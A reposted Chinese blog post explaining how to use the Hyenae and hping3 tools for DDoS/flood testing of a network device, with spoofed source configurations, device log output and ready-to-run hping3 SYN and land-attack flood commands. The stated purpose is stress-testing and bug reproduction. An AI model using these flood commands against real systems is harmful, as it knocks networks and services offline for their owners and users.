两款实用的DDos攻击工具[通俗易懂]

两款实用的DDos攻击工具[通俗易懂]两款实用的DDos攻击工具2018-02-22Network•Security865之前为了重现某个bug,需要对网络设备进行ddos攻击测试,同时也是对设备的网络攻击防护功能进行抗压测试。临阵磨枪,google了两款攻击工具,windows平台的hyenae,以及Linux平台的hping3,在此记录一下两者的用法。Hyenaehyenae是在Windows平台上非常好用的一…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

两款实用的DDos攻击工具

2018-02-22Network • Security865

之前为了重现某个bug,需要对网络设备进行ddos攻击测试,同时也是对设备的网络攻击防护功能进行抗压测试。临阵磨枪,google了两款攻击工具,windows平台的hyenae,以及Linux平台的hping3,在此记录一下两者的用法。

Hyenae

hyenae是在Windows平台上非常好用的一款ddos攻击工具,可以完成绝大多数的攻击操作。

download

Features

  • ARP-Request flooding
  • ARP-Cache poisoning
  • PPPoE session initiation flooding
  • Blind PPPoE session termination
  • ICMP-Echo flooding
  • ICMP-Smurf attack
  • ICMP based TCP-Connection reset
  • TCP-SYN flooding
  • TCP-Land attack
  • Blind TCP-Connection reset
  • UDP flooding
  • DNS-Query flooding
  • DHCP-Discover flooding
  • DHCP starvation attack
  • DHCP-Release forcing
  • Cisco HSRP active router hijacking
  • Pattern based packet address configuration
  • Intelligent address and address protocol detection
  • Smart wildcard-based randomization
  • Daemon for setting up remote attack networks – HyenaeFE QT-Frontend support

interface

hyenae interface

hyenae的界面比较简单,图中展示的是SYN/ACK洪泛攻击的配置选项。

  • operation mode中可以选择网卡
  • Network Protocol中可以选择攻击方式对应的网络协议,如SYN洪泛攻击对应传输层的TCPIP协议可选IPv4, IPv6
  • 攻击源的IP,MAC地址以及端口号可以非常灵活的设置,按MAC-IP@port的格式书写,如图中的攻击源匹配模式%-172.17.14.158@80
    • % 代表任意,在此处代表任意的MAC地址
    • 172.17.14.158为伪造的攻击源IP,可以修改为任意的合法IP
    • 80为端口号,80同时也是网络服务器的默认端口
  • 攻击目标的设置方式与攻击源一致,图中的%-172.17.14.10@80
    • % 随机生成MAC地址
    • 172.17.14.10代表被攻击的IP
    • 80为攻击目标的被攻击端口号
  • 针对TCP协议,右侧给出其对应的5个常见flagsFIN, SYN, RST, PSH, ACK
    • 可以随意进行单选或多选,以实现不同的攻击方式
    • 随意的组合可以产生正常通信过程中无法出现的数据包
  • 软件下方可以设置数据包的发送速率,默认为无限速发送,这会暂用大量带宽,导致网络拥塞;当然啦,这个软件本就是为了攻击网络,导致网络瘫痪正是其目的所在
  • 选择不同的攻击方式,会显示相应不同的配置选项

简单说,这幅图的作用是产生MAC地址随机,IP172.17.14.158,端口为80的伪造源,去攻击目的MAC随机,IP172.17.14.10web server

由于目的MAC随机,当MAC地址首字节为奇数时,生成的数据包为广播包,此时将产生广播风暴,局域网内的所有设备都将收到大量的广播包,当速率很高时,很容易导致局域网瘫痪,这是需要注意的。本人当时年少轻狂,有次测试,使用全速率的广播式SYN/ACK攻击,直接导致部门的局域网瘫痪断网,幸好是晚上,后来找人重置了部门内的网络设备才恢复,想想真是罪过啊。

Use cases

  • Land Attack
    • src: %-172.17.14.94@53
    • des: %-172.17.14.94@80
 
  1. DoS *** 3118 *** {Land Attack} are suppressed!
  2. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  3. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  4. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  • SYN/ACK scan (TCP SYN ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 3896 *** {SYN/ACK Scan} are suppressed!
  2. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  • ping flood (icmp echo)
    • src: %-172.17.14.8
    • des: %-172.17.14.94
 
  1. DoS *** 1881 *** {Ping Flood} are suppressed!
  2. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  3. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  4. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  • ping sweep (icmp echo)
    • src: %-%
    • des: %-%
 
  1. DoS *** 1719 *** {Ping Sweep} are suppressed!
  2. [DoS Attack: Ping Sweep] from source: 188.167.1.1,
  3. [DoS Attack: Ping Sweep] from source: 113.172.1.5,
  4. [DoS Attack: Ping Sweep] from source: 175.181.2.6,
  • RST Scan(TCP RST)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 4023 *** {RST Scan} are suppressed!
  2. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  • ACK scan (TCP ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 3989 *** {ACK Scan} are suppressed!
  2. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80
  • FIN scan(TCP FIN)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
 
  1. DoS *** 3009 *** {FIN Scan} are suppressed!
  2. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

hping3

hping3是用于生成和解析TCPIP协议数据包的开源工具

hping3同样可用于产生ddos攻击包,但与hyenae不同的是,hping3无法手动设置MAC地址,而是根据IP地址自动获取

需要注意的是,如果使用搬瓦工购买的vps向公网IP执行hping3攻击的话,最好不要尝试,如果要用也一定记得限速,否则就会被警告并关停,当然你有3次机会重置

vps warning

examples

 
  1. # land attack
  2. $ sudo hping3 -V -c 10000 -d 120 -S -w 64 --keep -p 80 -s 20000 --flood -a 172.17.14.52 172.17.14.52
  3. # syn/ack attack
  4. $ sudo hping3 -V -c 10000 -d 120 -S -A -w 64 --keep -p 80 -s 80 --flood -a 172.17.14.192 172.17.14.52
  5.  
  6. # -V verbose
  7. # -c packet count
  8. # -d data size
  9. # -p destPort
  10. # -s srcPort
  11. # -a srcIP
  12. # -S SYN tag
  13. # -A ACK tag
  14. # -w winsize
  15. # -I interface

reference

转自:  https://www.litreily.top/2018/02/22/ddos-attack/

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/157752.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 07 技术扩展-软件工程Server服务器知识点[通俗易懂]

    07 技术扩展-软件工程Server服务器知识点[通俗易懂]Web项目中的服务器一、Server概述为客户端提供各种服务的功能强大的计算机二、访问服务器服务器的地址—-域名/IP地址对应服务端口服务所用协议—-http/httpshttps://www.baidu.com:80/协议://域名:端口号/三、访问本地服务安装node.jsDOS命令窗口cddesktop/indexDOS命令…

    2022年9月5日
    2
  • OSChina 周二乱弹 ——区块链与女朋友之间的关系[通俗易懂]

    OSChina 周二乱弹 ——区块链与女朋友之间的关系[通俗易懂]2019独角兽企业重金招聘Python工程师标准>>>…

    2022年7月27日
    9
  • 虚拟机突然连不上网

    虚拟机突然连不上网虚拟机用着用着突然连不上网了,自己的主机却有网这个一般是因为电脑管家这些软件升级,把虚拟机的网络连接断掉了桌面右击我的电脑,点击管理,点击服务和应用程序里面服务,然后下拉右边,找到VMwareDHCP…和VMwareNAT…然后右击启动,虚拟机就能连上网了。…

    2022年6月26日
    27
  • setCapture 和 releaseCapture

    setCapture 和 releaseCapturesetCapture函数的作用就是将后续的mouse事件都发送给这个对象,releaseCapture就是将鼠标事件还回去,由document、window、object之类的自行来处理。这样就保证了在拖动的过程中,不会由于经过了其它的元素而受到干扰另外,还有一个很重要的事情是,在Win32上,mousemove的事件不是一个连续的,也就是说,并不是我们每次移动1px的鼠标指针,就会发生一个mousemove,windows会周期性检查mouse的位置变化来产生mousemove的事件。所以,如

    2022年5月3日
    46
  • linux用netstat查看服务及监听端口

    linux用netstat查看服务及监听端口

    2021年10月27日
    58
  • qt串口通信接收数据不完整_qt串口接收数据

    qt串口通信接收数据不完整_qt串口接收数据高通QM215高速串口调试总结参考文档硬件和复用情况确认修改如下串口调试测试程序代码:将串口设置为高速串口,AP端收到的数据一直为0XFD参考文档1、sp80-pk881-6_a_qm215_linux_android_software_porting_manual.pdf2、80-pk881-21_a_qm215_linux_peripheral_(uart,_spi,_i2c)_ove…

    2022年10月10日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号